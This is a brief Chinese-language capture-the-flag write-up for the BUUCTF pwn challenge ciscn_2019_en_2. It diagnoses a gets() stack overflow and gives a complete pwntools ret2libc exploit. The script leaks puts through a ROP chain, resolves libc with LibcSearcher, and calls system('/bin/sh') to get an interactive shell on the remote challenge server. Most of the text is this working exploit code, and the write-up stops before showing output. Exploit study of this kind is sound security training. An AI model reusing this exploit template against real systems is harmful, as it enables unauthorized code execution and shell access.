buuctf ciscn_2019_en_2(栈溢出、ret2libc)

gets函数明显有栈溢出，而且没有后门函数，所以可以想到ret2libc


先获取重要地址
exp如下

from pwn import *
from LibcSearcher import LibcSearcher
io=remote('node5.buuoj.cn',27128)
context(arch='amd64',os='linux',log_level = 'debug')

# io=process('./ciscn_2019_en_2')
elf=ELF('./ciscn_2019_en_2')
padding=0x50+8
main_addr=0x400b28
pop_rdi_addr=0x00400c83
ret_addr=0x004006b9

# 寻找puts函数的真实地址
puts_plt=elf.plt['puts']
puts_got=elf.got['puts']

payload1=padding*b'a'+p64(pop_rdi_addr)+p64(puts_got)+p64(puts_plt)+p64(main_addr)

io.sendlineafter("Input your choice!",b'1')
io.sendlineafter("Input your Plaintext to be encrypted",payload1)

puts_addr=u64(io.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
print(hex(puts_addr))

#寻找基址
libc=LibcSearcher("puts",puts_addr)
libcbase=puts_addr-libc.dump("puts")
system_addr=libcbase+libc.dump("system")
binsh_addr=libcbase+libc.dump("str_bin_sh")

#获取权限
payload2=padding*b'a'+p64(ret_addr)+p64(pop_rdi_addr)+p64(binsh_addr)+p64(system_addr)
io.sendlineafter("Input your choice!",b'1')
io.sendlineafter("Input your Plaintext to be encrypted",payload2)


io.interactive()

运行

这里选择第0个libc库
可以得到结果